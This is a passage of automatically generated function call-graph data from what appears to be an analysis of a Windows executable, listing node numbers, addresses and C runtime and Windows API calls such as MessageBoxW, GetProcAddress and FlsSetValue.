16033->16034 16047 7ff69f3e6b4a __std_exception_destroy 16033->16047 16034->16047 17211 7ff69f3e1440 16034->17211 16036 7ff69f3e6b54 16037 7ff69f3e3fe0 49 API calls 16036->16037 16036->16047 16038 7ff69f3e6b76 16037->16038 16039 7ff69f3e6b7b 16038->16039 16040 7ff69f3e3fe0 49 API calls 16038->16040 16041 7ff69f3e2870 53 API calls 16039->16041 16042 7ff69f3e6b9a 16040->16042 16041->16047 16042->16039 16043 7ff69f3e3fe0 49 API calls 16042->16043 16044 7ff69f3e6bb6 16043->16044 16044->16039 16045 7ff69f3e6bbf 16044->16045 16047->15794 16060 7ff69f3e30ee __scrt_get_show_window_mode 16049->16060 16050 7ff69f3eb870 _log10_special 8 API calls 16051 7ff69f3e338e 16050->16051 16051->15826 16068 7ff69f3e83e0 LocalFree 16051->16068 16052 7ff69f3e32e7 16052->16050 16054 7ff69f3e1bf0 49 API calls 16054->16060 16055 7ff69f3e3309 16057 7ff69f3e25f0 53 API calls 16055->16057 16057->16052 16059 7ff69f3e32e9 16063 7ff69f3e25f0 53 API calls 16059->16063 16060->16052 16060->16054 16060->16055 16060->16059 16062 7ff69f3e2870 53 API calls 16060->16062 16066 7ff69f3e32f7 16060->16066 17272 7ff69f3e3f10 16060->17272 17278 7ff69f3e7530 16060->17278 17290 7ff69f3e15c0 16060->17290 17328 7ff69f3e68e0 16060->17328 17332 7ff69f3e3b40 16060->17332 17376 7ff69f3e3e00 16060->17376 16062->16060 16063->16052 16067 7ff69f3e25f0 53 API calls 16066->16067 16067->16052 16070 7ff69f3e262a 16069->16070 16071 7ff69f3f3ca4 49 API calls 16070->16071 16072 7ff69f3e2652 16071->16072 16073 7ff69f3e86b0 2 API calls 16072->16073 16074 7ff69f3e266a 16073->16074 16075 7ff69f3e268e MessageBoxA 16074->16075 16076 7ff69f3e2677 MessageBoxW 16074->16076 16077 7ff69f3e26a0 16075->16077 16076->16077 16081 7ff69f3eb879 16080->16081 16082 7ff69f3e372a 16081->16082 16083 7ff69f3ebc00 IsProcessorFeaturePresent 16081->16083 16082->15840 16084 7ff69f3ebc18 16083->16084 17512 7ff69f3ebdf8 RtlCaptureContext 16084->17512 16090 7ff69f3e3f7c 16089->16090 16091 7ff69f3e86b0 2 API calls 16090->16091 16092 7ff69f3e3fa4 16091->16092 16093 7ff69f3e86b0 2 API calls 16092->16093 16094 7ff69f3e3fb7 16093->16094 17517 7ff69f3f52a4 16094->17517 16097 7ff69f3eb870 _log10_special 8 API calls 16098 7ff69f3e3746 16097->16098 16098->15747 16099 7ff69f3e76a0 16098->16099 16100 7ff69f3e76c4 16099->16100 16101 7ff69f3ef9f4 73 API calls 16100->16101 16106 7ff69f3e779b __std_exception_destroy 16100->16106 16102 7ff69f3e76e0 16101->16102 16102->16106 17908 7ff69f3f6bd8 16102->17908 16104 7ff69f3ef9f4 73 API calls 16107 7ff69f3e76f5 16104->16107 16105 7ff69f3ef6bc _fread_nolock 53 API calls 16105->16107 16106->15752 16107->16104 16107->16105 16107->16106 16109 7ff69f3ef39c 16108->16109 17923 7ff69f3ef148 16109->17923 16111 7ff69f3ef3b5 16111->15747 16113 7ff69f3e1bf0 49 API calls 16112->16113 16114 7ff69f3e3ead 16113->16114 16114->15762 16116 7ff69f3e1bf0 49 API calls 16115->16116 16117 7ff69f3e4010 16116->16117 16117->15788 16117->16117 16128 7ff69f3e65bc 16118->16128 16119 7ff69f3eb870 _log10_special 8 API calls 16120 7ff69f3e66f1 16119->16120 16120->15797 16121 7ff69f3e17e0 45 API calls 16121->16128 16122 7ff69f3e675d 16123 7ff69f3e25f0 53 API calls 16122->16123 16136 7ff69f3e66df 16123->16136 16124 7ff69f3e1bf0 49 API calls 16124->16128 16125 7ff69f3e674a 16127 7ff69f3e25f0 53 API calls 16125->16127 16126 7ff69f3e3f10 10 API calls 16126->16128 16127->16136 16128->16121 16128->16122 16128->16124 16128->16125 16128->16126 16129 7ff69f3e670d 16128->16129 16130 7ff69f3e7530 52 API calls 16128->16130 16132 7ff69f3e2870 53 API calls 16128->16132 16133 7ff69f3e6737 16128->16133 16134 7ff69f3e15c0 118 API calls 16128->16134 16128->16136 16137 7ff69f3e6720 16128->16137 16131 7ff69f3e25f0 53 API calls 16129->16131 16130->16128 16131->16136 16132->16128 16135 7ff69f3e25f0 53 API calls 16133->16135 16134->16128 16135->16136 16136->16119 16138 7ff69f3e25f0 53 API calls 16137->16138 16138->16136 17934 7ff69f3e81a0 16139->17934 16141 7ff69f3e6989 16142 7ff69f3e81a0 3 API calls 16141->16142 16143 7ff69f3e699c 16142->16143 16144 7ff69f3e69cf 16143->16144 16145 7ff69f3e69b4 16143->16145 16146 7ff69f3e25f0 53 API calls 16144->16146 17938 7ff69f3e6ea0 GetProcAddress 16145->17938 16148 7ff69f3e3916 16146->16148 16148->15810 16149 7ff69f3e6cd0 16148->16149 16150 7ff69f3e6ced 16149->16150 16156 7ff69f3e28aa 16155->16156 16157 7ff69f3f3ca4 49 API calls 16156->16157 16158 7ff69f3e28d2 16157->16158 16159 7ff69f3e86b0 2 API calls 16158->16159 16160 7ff69f3e28ea 16159->16160 16161 7ff69f3e290e MessageBoxA 16160->16161 16162 7ff69f3e28f7 MessageBoxW 16160->16162 16163 7ff69f3e2920 16161->16163 16162->16163 16164 7ff69f3eb870 _log10_special 8 API calls 16163->16164 16165 7ff69f3e2930 16164->16165 16166 7ff69f3e6780 16165->16166 16167 7ff69f3e68d6 16166->16167 16172 7ff69f3e6792 16166->16172 16167->15795 18003 7ff69f3e5af0 16173->18003 16181 7ff69f3e30b9 16182 7ff69f3e33a0 16181->16182 16183 7ff69f3e33ae 16182->16183 16185 7ff69f3e33bf 16183->16185 18291 7ff69f3e8180 FreeLibrary 16183->18291 16185->15806 16203 7ff69f3f986c 16186->16203 16190 7ff69f3f9b5f 16190->15888 16241 7ff69f3f477c EnterCriticalSection 16196->16241 16204 7ff69f3f98c3 16203->16204 16205 7ff69f3f9888 GetLastError 16203->16205 16204->16190 16209 7ff69f3f98d8 16204->16209 16206 7ff69f3f9898 16205->16206 16216 7ff69f3fa6a0 16206->16216 16210 7ff69f3f98f4 GetLastError SetLastError 16209->16210 16211 7ff69f3f990c 16209->16211 16210->16211 16211->16190 16212 7ff69f3f9c10 IsProcessorFeaturePresent 16211->16212 16213 7ff69f3f9c23 16212->16213 16233 7ff69f3f9924 16213->16233 16217 7ff69f3fa6bf FlsGetValue 16216->16217 16218 7ff69f3fa6da FlsSetValue 16216->16218 16219 7ff69f3fa6d4 16217->16219 16221 7ff69f3f98b3 SetLastError 16217->16221 16220 7ff69f3fa6e7 16218->16220 16218->16221 16219->16218 16222 7ff69f3fdea8 _get_daylight 11 API calls 16220->16222 16221->16204 16223 7ff69f3fa6f6 16222->16223 16224 7ff69f3fa714 FlsSetValue 16223->16224 16225 7ff69f3fa704 FlsSetValue 16223->16225 16227 7ff69f3fa732 16224->16227 16228 7ff69f3fa720 FlsSetValue 16224->16228 16226 7ff69f3fa70d 16225->16226 16229 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16226->16229 16230 7ff69f3fa204 _get_daylight 11 API calls 16227->16230 16228->16226 16229->16221 16231 7ff69f3fa73a 16230->16231 16232 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16231->16232 16232->16221 16234 7ff69f3f995e __CxxCallCatchBlock __scrt_get_show_window_mode 16233->16234 16235 7ff69f3f9986 RtlCaptureContext RtlLookupFunctionEntry 16234->16235 16236 7ff69f3f99c0 RtlVirtualUnwind 16235->16236 16237 7ff69f3f99f6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16235->16237 16236->16237 16240 7ff69f3f9a48 __CxxCallCatchBlock 16237->16240 16238 7ff69f3eb870 _log10_special 8 API calls 16239 7ff69f3f9a67 GetCurrentProcess TerminateProcess 16238->16239 16240->16238 16243 7ff69f3e33ec GetModuleFileNameW 16242->16243 16243->15892 16243->15893 16245 7ff69f3e85f2 16244->16245 16246 7ff69f3e85df FindClose 16244->16246 16247 7ff69f3eb870 _log10_special 8 API calls 16245->16247 16246->16245 16248 7ff69f3e3442 16247->16248 16248->15897 16248->15898 16250 7ff69f3ebb70 16249->16250 16251 7ff69f3e29fc GetLastError 16250->16251 16252 7ff69f3e2a29 16251->16252 16273 7ff69f3f3ef8 16252->16273 16257 7ff69f3eb870 _log10_special 8 API calls 16258 7ff69f3e2ae5 16257->16258 16258->15909 16260 7ff69f3e8660 GetFinalPathNameByHandleW CloseHandle 16259->16260 16261 7ff69f3e3458 16259->16261 16260->16261 16261->15905 16261->15906 16263 7ff69f3e26fa 16262->16263 16264 7ff69f3f3ef8 48 API calls 16263->16264 16265 7ff69f3e2722 MessageBoxW 16264->16265 16266 7ff69f3eb870 _log10_special 8 API calls 16265->16266 16267 7ff69f3e274c 16266->16267 16267->15909 16269 7ff69f3e878a WideCharToMultiByte 16268->16269 16270 7ff69f3e87b5 16268->16270 16269->16270 16271 7ff69f3e87cb __std_exception_destroy 16269->16271 16270->16271 16272 7ff69f3e87d2 WideCharToMultiByte 16270->16272 16271->15904 16272->16271 16274 7ff69f3f3f52 16273->16274 16275 7ff69f3f3f77 16274->16275 16277 7ff69f3f3fb3 16274->16277 16276 7ff69f3f9b24 _invalid_parameter_noinfo 37 API calls 16275->16276 16279 7ff69f3f3fa1 16276->16279 16295 7ff69f3f22b0 16277->16295 16281 7ff69f3eb870 _log10_special 8 API calls 16279->16281 16280 7ff69f3f4094 16282 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16280->16282 16283 7ff69f3e2a54 FormatMessageW 16281->16283 16282->16279 16291 7ff69f3e2590 16283->16291 16285 7ff69f3f40ba 16285->16280 16286 7ff69f3f40c4 16285->16286 16289 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16286->16289 16287 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16287->16279 16288 7ff69f3f4060 16288->16280 16290 7ff69f3f4069 16288->16290 16289->16279 16290->16287 16292 7ff69f3e25b5 16291->16292 16293 7ff69f3f3ef8 48 API calls 16292->16293 16294 7ff69f3e25d8 MessageBoxW 16293->16294 16294->16257 16296 7ff69f3f22ee 16295->16296 16297 7ff69f3f22de 16295->16297 16298 7ff69f3f2325 16296->16298 16299 7ff69f3f22f7 16296->16299 16302 7ff69f3f9b24 _invalid_parameter_noinfo 37 API calls 16297->16302 16298->16297 16301 7ff69f3f231d 16298->16301 16306 7ff69f3f2cc4 16298->16306 16339 7ff69f3f2710 16298->16339 16376 7ff69f3f1ea0 16298->16376 16300 7ff69f3f9b24 _invalid_parameter_noinfo 37 API calls 16299->16300 16300->16301 16301->16280 16301->16285 16301->16288 16301->16290 16302->16301 16307 7ff69f3f2d06 16306->16307 16308 7ff69f3f2d77 16306->16308 16309 7ff69f3f2da1 16307->16309 16310 7ff69f3f2d0c 16307->16310 16311 7ff69f3f2dd0 16308->16311 16312 7ff69f3f2d7c 16308->16312 16399 7ff69f3f1074 16309->16399 16315 7ff69f3f2d40 16310->16315 16316 7ff69f3f2d11 16310->16316 16318 7ff69f3f2dda 16311->16318 16319 7ff69f3f2de7 16311->16319 16323 7ff69f3f2ddf 16311->16323 16313 7ff69f3f2db1 16312->16313 16314 7ff69f3f2d7e 16312->16314 16406 7ff69f3f0c64 16313->16406 16317 7ff69f3f2d20 16314->16317 16326 7ff69f3f2d8d 16314->16326 16321 7ff69f3f2d17 16315->16321 16315->16323 16316->16319 16316->16321 16337 7ff69f3f2e10 16317->16337 16379 7ff69f3f3478 16317->16379 16318->16309 16318->16323 16413 7ff69f3f39cc 16319->16413 16321->16317 16327 7ff69f3f2d52 16321->16327 16334 7ff69f3f2d3b 16321->16334 16323->16337 16417 7ff69f3f1484 16323->16417 16326->16309 16329 7ff69f3f2d92 16326->16329 16327->16337 16389 7ff69f3f37b4 16327->16389 16329->16337 16395 7ff69f3f3878 16329->16395 16331 7ff69f3eb870 _log10_special 8 API calls 16333 7ff69f3f310a 16331->16333 16333->16298 16334->16337 16338 7ff69f3f2ffc 16334->16338 16424 7ff69f3f3ae0 16334->16424 16337->16331 16338->16337 16430 7ff69f3fdd18 16338->16430 16340 7ff69f3f2734 16339->16340 16341 7ff69f3f271e 16339->16341 16342 7ff69f3f9b24 _invalid_parameter_noinfo 37 API calls 16340->16342 16345 7ff69f3f2774 16340->16345 16343 7ff69f3f2d06 16341->16343 16344 7ff69f3f2d77 16341->16344 16341->16345 16342->16345 16346 7ff69f3f2da1 16343->16346 16347 7ff69f3f2d0c 16343->16347 16348 7ff69f3f2dd0 16344->16348 16349 7ff69f3f2d7c 16344->16349 16345->16298 16357 7ff69f3f1074 38 API calls 16346->16357 16352 7ff69f3f2d40 16347->16352 16353 7ff69f3f2d11 16347->16353 16355 7ff69f3f2dda 16348->16355 16356 7ff69f3f2de7 16348->16356 16360 7ff69f3f2ddf 16348->16360 16350 7ff69f3f2db1 16349->16350 16351 7ff69f3f2d7e 16349->16351 16362 7ff69f3f0c64 38 API calls 16350->16362 16354 7ff69f3f2d20 16351->16354 16365 7ff69f3f2d8d 16351->16365 16358 7ff69f3f2d17 16352->16358 16352->16360 16353->16356 16353->16358 16359 7ff69f3f3478 47 API calls 16354->16359 16375 7ff69f3f2e10 16354->16375 16355->16346 16355->16360 16361 7ff69f3f39cc 45 API calls 16356->16361 16371 7ff69f3f2d3b 16357->16371 16358->16354 16363 7ff69f3f2d52 16358->16363 16358->16371 16359->16371 16364 7ff69f3f1484 38 API calls 16360->16364 16360->16375 16361->16371 16362->16371 16366 7ff69f3f37b4 46 API calls 16363->16366 16363->16375 16364->16371 16365->16346 16367 7ff69f3f2d92 16365->16367 16366->16371 16369 7ff69f3f3878 37 API calls 16367->16369 16367->16375 16368 7ff69f3eb870 _log10_special 8 API calls 16370 7ff69f3f310a 16368->16370 16369->16371 16370->16298 16372 7ff69f3f3ae0 45 API calls 16371->16372 16374 7ff69f3f2ffc 16371->16374 16371->16375 16372->16374 16373 7ff69f3fdd18 46 API calls 16373->16374 16374->16373 16374->16375 16375->16368 16649 7ff69f3f02e8 16376->16649 16380 7ff69f3f349e 16379->16380 16442 7ff69f3efea0 16380->16442 16385 7ff69f3f35e3 16386 7ff69f3f3671 16385->16386 16388 7ff69f3f3ae0 45 API calls 16385->16388 16386->16334 16387 7ff69f3f3ae0 45 API calls 16387->16385 16388->16386 16390 7ff69f3f37e9 16389->16390 16391 7ff69f3f382e 16390->16391 16392 7ff69f3f3807 16390->16392 16393 7ff69f3f3ae0 45 API calls 16390->16393 16391->16334 16394 7ff69f3fdd18 46 API calls 16392->16394 16393->16392 16394->16391 16398 7ff69f3f3899 16395->16398 16396 7ff69f3f9b24 _invalid_parameter_noinfo 37 API calls 16397 7ff69f3f38ca 16396->16397 16397->16334 16398->16396 16398->16397 16400 7ff69f3f10a7 16399->16400 16401 7ff69f3f10d6 16400->16401 16403 7ff69f3f1193 16400->16403 16405 7ff69f3f1113 16401->16405 16581 7ff69f3eff48 16401->16581 16404 7ff69f3f9b24 _invalid_parameter_noinfo 37 API calls 16403->16404 16404->16405 16405->16334 16407 7ff69f3f0c97 16406->16407 16408 7ff69f3f0cc6 16407->16408 16410 7ff69f3f0d83 16407->16410 16409 7ff69f3eff48 12 API calls 16408->16409 16412 7ff69f3f0d03 16408->16412 16409->16412 16411 7ff69f3f9b24 _invalid_parameter_noinfo 37 API calls 16410->16411 16411->16412 16412->16334 16414 7ff69f3f3a0f 16413->16414 16416 7ff69f3f3a13 __crtLCMapStringW 16414->16416 16589 7ff69f3f3a68 16414->16589 16416->16334 16418 7ff69f3f14b7 16417->16418 16419 7ff69f3f14e6 16418->16419 16421 7ff69f3f15a3 16418->16421 16420 7ff69f3eff48 12 API calls 16419->16420 16423 7ff69f3f1523 16419->16423 16420->16423 16422 7ff69f3f9b24 _invalid_parameter_noinfo 37 API calls 16421->16422 16422->16423 16423->16334 16425 7ff69f3f3af7 16424->16425 16593 7ff69f3fccc8 16425->16593 16431 7ff69f3fdd49 16430->16431 16439 7ff69f3fdd57 16430->16439 16432 7ff69f3fdd77 16431->16432 16433 7ff69f3f3ae0 45 API calls 16431->16433 16431->16439 16434 7ff69f3fddaf 16432->16434 16435 7ff69f3fdd88 16432->16435 16433->16432 16437 7ff69f3fde3a 16434->16437 16438 7ff69f3fddd9 16434->16438 16434->16439 16639 7ff69f3ff3b0 16435->16639 16440 7ff69f3febb0 _fread_nolock MultiByteToWideChar 16437->16440 16438->16439 16642 7ff69f3febb0 16438->16642 16439->16338 16440->16439 16443 7ff69f3efec6 16442->16443 16444 7ff69f3efed7 16442->16444 16450 7ff69f3fd880 16443->16450 16444->16443 16445 7ff69f3fc90c _fread_nolock 12 API calls 16444->16445 16446 7ff69f3eff04 16445->16446 16447 7ff69f3eff18 16446->16447 16448 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16446->16448 16449 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16447->16449 16448->16447 16449->16443 16451 7ff69f3fd8d0 16450->16451 16452 7ff69f3fd89d 16450->16452 16451->16452 16455 7ff69f3fd902 16451->16455 16453 7ff69f3f9b24 _invalid_parameter_noinfo 37 API calls 16452->16453 16454 7ff69f3f35c1 16453->16454 16454->16385 16454->16387 16461 7ff69f3fda15 16455->16461 16467 7ff69f3fd94a 16455->16467 16456 7ff69f3fdb07 16505 7ff69f3fcd6c 16456->16505 16458 7ff69f3fdacd 16498 7ff69f3fd104 16458->16498 16460 7ff69f3fda9c 16491 7ff69f3fd3e4 16460->16491 16461->16456 16461->16458 16461->16460 16462 7ff69f3fda5f 16461->16462 16464 7ff69f3fda55 16461->16464 16481 7ff69f3fd614 16462->16481 16464->16458 16466 7ff69f3fda5a 16464->16466 16466->16460 16466->16462 16467->16454 16472 7ff69f3f97b4 16467->16472 16470 7ff69f3f9c10 _isindst 17 API calls 16471 7ff69f3fdb64 16470->16471 16473 7ff69f3f97c1 16472->16473 16474 7ff69f3f97cb 16472->16474 16473->16474 16479 7ff69f3f97e6 16473->16479 16475 7ff69f3f43f4 _get_daylight 11 API calls 16474->16475 16476 7ff69f3f97d2 16475->16476 16514 7ff69f3f9bf0 16476->16514 16478 7ff69f3f97de 16478->16454 16478->16470 16479->16478 16480 7ff69f3f43f4 _get_daylight 11 API calls 16479->16480 16480->16476 16517 7ff69f4033bc 16481->16517 16485 7ff69f3fd6bc 16486 7ff69f3fd711 16485->16486 16488 7ff69f3fd6dc 16485->16488 16490 7ff69f3fd6c0 16485->16490 16570 7ff69f3fd200 16486->16570 16566 7ff69f3fd4bc 16488->16566 16490->16454 16492 7ff69f4033bc 38 API calls 16491->16492 16493 7ff69f3fd42e 16492->16493 16494 7ff69f402e04 37 API calls 16493->16494 16495 7ff69f3fd47e 16494->16495 16496 7ff69f3fd482 16495->16496 16497 7ff69f3fd4bc 45 API calls 16495->16497 16496->16454 16497->16496 16499 7ff69f4033bc 38 API calls 16498->16499 16500 7ff69f3fd14f 16499->16500 16501 7ff69f402e04 37 API calls 16500->16501 16502 7ff69f3fd1a7 16501->16502 16503 7ff69f3fd1ab 16502->16503 16504 7ff69f3fd200 45 API calls 16502->16504 16503->16454 16504->16503 16506 7ff69f3fcde4 16505->16506 16507 7ff69f3fcdb1 16505->16507 16509 7ff69f3fcdfc 16506->16509 16511 7ff69f3fce7d 16506->16511 16508 7ff69f3f9b24 _invalid_parameter_noinfo 37 API calls 16507->16508 16513 7ff69f3fcddd __scrt_get_show_window_mode 16508->16513 16510 7ff69f3fd104 46 API calls 16509->16510 16510->16513 16512 7ff69f3f3ae0 45 API calls 16511->16512 16511->16513 16512->16513 16513->16454 16515 7ff69f3f9a88 _invalid_parameter_noinfo 37 API calls 16514->16515 16516 7ff69f3f9c09 16515->16516 16516->16478 16518 7ff69f40340f fegetenv 16517->16518 16519 7ff69f40713c 37 API calls 16518->16519 16522 7ff69f403462 16519->16522 16520 7ff69f40348f 16525 7ff69f3f97b4 __std_exception_copy 37 API calls 16520->16525 16521 7ff69f403552 16523 7ff69f40713c 37 API calls 16521->16523 16522->16521 16526 7ff69f40352c 16522->16526 16527 7ff69f40347d 16522->16527 16524 7ff69f40357c 16523->16524 16528 7ff69f40713c 37 API calls 16524->16528 16529 7ff69f40350d 16525->16529 16530 7ff69f3f97b4 __std_exception_copy 37 API calls 16526->16530 16527->16520 16527->16521 16531 7ff69f40358d 16528->16531 16532 7ff69f404634 16529->16532 16536 7ff69f403515 16529->16536 16530->16529 16534 7ff69f407330 20 API calls 16531->16534 16533 7ff69f3f9c10 _isindst 17 API calls 16532->16533 16535 7ff69f404649 16533->16535 16544 7ff69f4035f6 __scrt_get_show_window_mode 16534->16544 16537 7ff69f3eb870 _log10_special 8 API calls 16536->16537 16538 7ff69f3fd661 16537->16538 16562 7ff69f402e04 16538->16562 16539 7ff69f40399f __scrt_get_show_window_mode 16540 7ff69f403cdf 16541 7ff69f402f20 37 API calls 16540->16541 16548 7ff69f4043f7 16541->16548 16542 7ff69f403c8b 16542->16540 16545 7ff69f40464c memcpy_s 37 API calls 16542->16545 16543 7ff69f403637 memcpy_s 16557 7ff69f403f7b memcpy_s __scrt_get_show_window_mode 16543->16557 16561 7ff69f403a93 memcpy_s __scrt_get_show_window_mode 16543->16561 16544->16539 16544->16543 16546 7ff69f3f43f4 _get_daylight 11 API calls 16544->16546 16545->16540 16547 7ff69f403a70 16546->16547 16549 7ff69f3f9bf0 _invalid_parameter_noinfo 37 API calls 16547->16549 16551 7ff69f40464c memcpy_s 37 API calls 16548->16551 16555 7ff69f404452 16548->16555 16549->16543 16550 7ff69f4045d8 16553 7ff69f40713c 37 API calls 16550->16553 16551->16555 16552 7ff69f3f43f4 11 API calls _get_daylight 16552->16557 16553->16536 16554 7ff69f3f43f4 11 API calls _get_daylight 16554->16561 16555->16550 16556 7ff69f402f20 37 API calls 16555->16556 16559 7ff69f40464c memcpy_s 37 API calls 16555->16559 16556->16555 16557->16540 16557->16542 16557->16552 16560 7ff69f3f9bf0 37 API calls _invalid_parameter_noinfo 16557->16560 16558 7ff69f3f9bf0 37 API calls _invalid_parameter_noinfo 16558->16561 16559->16555 16560->16557 16561->16542 16561->16554 16561->16558 16563 7ff69f402e23 16562->16563 16564 7ff69f3f9b24 _invalid_parameter_noinfo 37 API calls 16563->16564 16565 7ff69f402e4e memcpy_s 16563->16565 16564->16565 16565->16485 16567 7ff69f3fd4e8 memcpy_s 16566->16567 16568 7ff69f3f3ae0 45 API calls 16567->16568 16569 7ff69f3fd5a2 memcpy_s __scrt_get_show_window_mode 16567->16569 16568->16569 16569->16490 16571 7ff69f3fd23b 16570->16571 16575 7ff69f3fd288 memcpy_s 16570->16575 16572 7ff69f3f9b24 _invalid_parameter_noinfo 37 API calls 16571->16572 16573 7ff69f3fd267 16572->16573 16573->16490 16574 7ff69f3fd2f3 16576 7ff69f3f97b4 __std_exception_copy 37 API calls 16574->16576 16575->16574 16577 7ff69f3f3ae0 45 API calls 16575->16577 16578 7ff69f3fd335 memcpy_s 16576->16578 16577->16574 16579 7ff69f3f9c10 _isindst 17 API calls 16578->16579 16580 7ff69f3fd3e0 16579->16580 16582 7ff69f3eff7f 16581->16582 16588 7ff69f3eff6e 16581->16588 16583 7ff69f3fc90c _fread_nolock 12 API calls 16582->16583 16582->16588 16584 7ff69f3effb0 16583->16584 16585 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16584->16585 16587 7ff69f3effc4 16584->16587 16585->16587 16586 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16586->16588 16587->16586 16588->16405 16590 7ff69f3f3a86 16589->16590 16592 7ff69f3f3a8e 16589->16592 16591 7ff69f3f3ae0 45 API calls 16590->16591 16591->16592 16592->16416 16594 7ff69f3fcce1 16593->16594 16595 7ff69f3f3b1f 16593->16595 16594->16595 16601 7ff69f402614 16594->16601 16597 7ff69f3fcd34 16595->16597 16598 7ff69f3fcd4d 16597->16598 16600 7ff69f3f3b2f 16597->16600 16598->16600 16636 7ff69f401960 16598->16636 16600->16338 16613 7ff69f3fa460 GetLastError 16601->16613 16604 7ff69f40266e 16604->16595 16614 7ff69f3fa484 FlsGetValue 16613->16614 16615 7ff69f3fa4a1 FlsSetValue 16613->16615 16616 7ff69f3fa49b 16614->16616 16633 7ff69f3fa491 16614->16633 16617 7ff69f3fa4b3 16615->16617 16615->16633 16616->16615 16619 7ff69f3fdea8 _get_daylight 11 API calls 16617->16619 16618 7ff69f3fa50d SetLastError 16620 7ff69f3fa52d 16618->16620 16621 7ff69f3fa51a 16618->16621 16622 7ff69f3fa4c2 16619->16622 16623 7ff69f3f9814 __CxxCallCatchBlock 38 API calls 16620->16623 16621->16604 16635 7ff69f3ff5e8 EnterCriticalSection 16621->16635 16624 7ff69f3fa4e0 FlsSetValue 16622->16624 16625 7ff69f3fa4d0 FlsSetValue 16622->16625 16626 7ff69f3fa532 16623->16626 16628 7ff69f3fa4fe 16624->16628 16629 7ff69f3fa4ec FlsSetValue 16624->16629 16627 7ff69f3fa4d9 16625->16627 16631 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16627->16631 16630 7ff69f3fa204 _get_daylight 11 API calls 16628->16630 16629->16627 16632 7ff69f3fa506 16630->16632 16631->16633 16634 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16632->16634 16633->16618 16634->16618 16637 7ff69f3fa460 __CxxCallCatchBlock 45 API calls 16636->16637 16638 7ff69f401969 16637->16638 16645 7ff69f406098 16639->16645 16644 7ff69f3febb9 MultiByteToWideChar 16642->16644 16648 7ff69f4060fc 16645->16648 16646 7ff69f3eb870 _log10_special 8 API calls 16647 7ff69f3ff3cd 16646->16647 16647->16439 16648->16646 16650 7ff69f3f032f 16649->16650 16651 7ff69f3f031d 16649->16651 16654 7ff69f3f033d 16650->16654 16658 7ff69f3f0379 16650->16658 16652 7ff69f3f43f4 _get_daylight 11 API calls 16651->16652 16653 7ff69f3f0322 16652->16653 16655 7ff69f3f9bf0 _invalid_parameter_noinfo 37 API calls 16653->16655 16656 7ff69f3f9b24 _invalid_parameter_noinfo 37 API calls 16654->16656 16661 7ff69f3f032d 16655->16661 16656->16661 16657 7ff69f3f06f5 16659 7ff69f3f43f4 _get_daylight 11 API calls 16657->16659 16657->16661 16658->16657 16660 7ff69f3f43f4 _get_daylight 11 API calls 16658->16660 16662 7ff69f3f0989 16659->16662 16663 7ff69f3f06ea 16660->16663 16661->16298 16664 7ff69f3f9bf0 _invalid_parameter_noinfo 37 API calls 16662->16664 16665 7ff69f3f9bf0 _invalid_parameter_noinfo 37 API calls 16663->16665 16664->16661 16665->16657 16667 7ff69f3efa24 16666->16667 16696 7ff69f3ef784 16667->16696 16669 7ff69f3efa3d 16669->15921 16708 7ff69f3ef6dc 16670->16708 16674 7ff69f3e277c 16673->16674 16675 7ff69f3f43f4 _get_daylight 11 API calls 16674->16675 16676 7ff69f3e2799 16675->16676 16722 7ff69f3f3ca4 16676->16722 16681 7ff69f3e1bf0 49 API calls 16682 7ff69f3e2807 16681->16682 16683 7ff69f3e86b0 2 API calls 16682->16683 16684 7ff69f3e281f 16683->16684 16685 7ff69f3e2843 MessageBoxA 16684->16685 16686 7ff69f3e282c MessageBoxW 16684->16686 16687 7ff69f3e2855 16685->16687 16686->16687 16688 7ff69f3eb870 _log10_special 8 API calls 16687->16688 16689 7ff69f3e2865 16688->16689 16689->15950 16691 7ff69f3e1b06 16690->16691 16692 7ff69f3ef439 16690->16692 16691->15949 16691->15950 16693 7ff69f3f43f4 _get_daylight 11 API calls 16692->16693 16694 7ff69f3ef43e 16693->16694 16695 7ff69f3f9bf0 _invalid_parameter_noinfo 37 API calls 16694->16695 16695->16691 16697 7ff69f3ef7ee 16696->16697 16698 7ff69f3ef7ae 16696->16698 16697->16698 16700 7ff69f3ef7fa 16697->16700 16699 7ff69f3f9b24 _invalid_parameter_noinfo 37 API calls 16698->16699 16701 7ff69f3ef7d5 16699->16701 16707 7ff69f3f477c EnterCriticalSection 16700->16707 16701->16669 16709 7ff69f3e19b9 16708->16709 16710 7ff69f3ef706 16708->16710 16709->15927 16709->15928 16710->16709 16711 7ff69f3ef715 __scrt_get_show_window_mode 16710->16711 16712 7ff69f3ef752 16710->16712 16714 7ff69f3f43f4 _get_daylight 11 API calls 16711->16714 16721 7ff69f3f477c EnterCriticalSection 16712->16721 16716 7ff69f3ef72a 16714->16716 16719 7ff69f3f9bf0 _invalid_parameter_noinfo 37 API calls 16716->16719 16719->16709 16725 7ff69f3f3cfe 16722->16725 16723 7ff69f3f3d23 16724 7ff69f3f9b24 _invalid_parameter_noinfo 37 API calls 16723->16724 16730 7ff69f3f3d4d 16724->16730 16725->16723 16726 7ff69f3f3d5f 16725->16726 16752 7ff69f3f1f30 16726->16752 16728 7ff69f3f3e3c 16729 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16728->16729 16729->16730 16731 7ff69f3eb870 _log10_special 8 API calls 16730->16731 16733 7ff69f3e27d8 16731->16733 16740 7ff69f3f4480 16733->16740 16734 7ff69f3f3e60 16734->16728 16737 7ff69f3f3e6a 16734->16737 16735 7ff69f3f3e11 16738 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16735->16738 16736 7ff69f3f3e08 16736->16728 16736->16735 16739 7ff69f3f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16737->16739 16738->16730 16739->16730 16741 7ff69f3fa5d8 _get_daylight 11 